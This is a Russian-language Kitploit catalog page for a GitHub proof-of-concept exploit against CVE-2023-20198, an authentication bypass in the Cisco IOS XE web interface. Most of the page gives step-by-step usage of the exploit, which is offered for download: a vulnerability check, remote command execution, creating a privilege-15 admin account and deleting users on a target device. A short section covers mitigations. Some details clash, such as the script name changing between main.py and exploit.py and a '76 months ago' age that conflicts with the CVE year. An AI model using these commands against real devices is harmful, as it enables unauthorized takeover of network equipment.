Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-20198-Exploit — Эксплойт для доказательства концепции уязвимости CVE-2023-20198, позволяющей обойти аутентификацию, затрагивающей веб-интерфейс Cisco IOS XE | Kitploit
Инструменты/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

Эксплойт для доказательства концепции уязвимости CVE-2023-20198, позволяющей обойти аутентификацию, затрагивающей веб-интерфейс Cisco IOS XE

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
76 месяцев назадЕщё не проверено

Обход аутентификации Cisco IOS XE (CVE-2023-20198)

Этот репозиторий содержит эксплойт концепции (PoC) для CVE-2023-20198 — уязвимости обхода аутентификации, затрагивающей веб-интерфейс Cisco IOS XE.

Уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольные команды на уязвимых устройствах Cisco через специально сформированные SOAP-запросы, что может привести к полной компрометации устройства, включая удаленное выполнение команд и создание/удаление административных пользователей.

Обзор уязвимости

  • CVE: CVE-2023-20198

  • Затронутый продукт: Cisco IOS XE (веб-интерфейс / интерфейс WSMA)

  • Воздействие:

    • Обход аутентификации
    • Удаленное выполнение команд (RCE)
    • Несанкционированное создание пользователей
    • Несанкционированное удаление пользователей
  • Вектор атаки: Сеть (HTTP/HTTPS)

  • Требуемые привилегии: Нет (неаутентифицированный)

Данная уязвимость вызвана некорректной обработкой аутентификации в конечной точке Web Services Management Agent (WSMA), что позволяет злоумышленникам обходить аутентификацию с помощью специально сформированных HTTP-запросов.

Требования

  • Python 3.x
  • requests
  • colorama

Установка зависимостей:

root@kitploit:~
pip install -r requirements.txt

Использование

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Cisco IOS XE Device
  -c, --check           Check if the Target is vulnerable to CVE-2023-20198
  -C CMD, --cmd CMD     Cisco IOS XE Command to Execute
  -a, --add             Add New Username and Password
  -d, --delete          Delete existing User
  -u USERNAME, --username USERNAME
                        Username for Account Creation
  -p PASSWORD, --password PASSWORD
                        Password for Account Creation (Random Password Generated if not Provided)

Usage

Параметры командной строки

Проверка уязвимости

Проверьте, уязвимо ли целевое устройство:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -c

Vulnerability Check

Если устройство уязвимо, инструмент автоматически обнаружит эксплуатируемую конечную точку WSMA и отобразит сведения об устройстве.

Удаленное выполнение команд

Выполнение команд на уязвимом устройстве:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"

Пример:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

Exploit

Добавление административного пользователя

Создание нового административного пользователя с привилегией 15:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

Account Creation

Если пароль не указан, скрипт автоматически генерирует случайный надежный пароль.

Доступ к веб-интерфейсу

С помощью только что созданной учетной записи можно получить доступ к веб-интерфейсу устройства.

Web UI

Удаление существующего пользователя

Удаление существующего пользователя:

root@kitploit:~
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

Account Deletion

Обнаружение и смягчение

  • Обновите Cisco IOS XE до последней исправленной версии

  • Отключите веб-интерфейс, если он не требуется:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • Ограничьте доступ к управлению с помощью ACL

Ссылки

  • Cisco Advisory — CVE-2023-20198
  • NVD: CVE-2023-20198
  • Cisco IOS XE WSMA Documentation
  • Security Research Community Reports
Скачать инструмент
OptionDescription
-t, --targetЦелевое устройство Cisco IOS XE (обязательно)
-c, --checkПроверить, уязвимо ли целевое устройство
-C, --cmdВыполнить команду Cisco IOS XE
-a, --addДобавить нового административного пользователя
-d, --deleteУдалить существующего пользователя
-u, --usernameИмя пользователя для создания/удаления
-p, --passwordПароль для новой учетной записи (случайный, если не указан)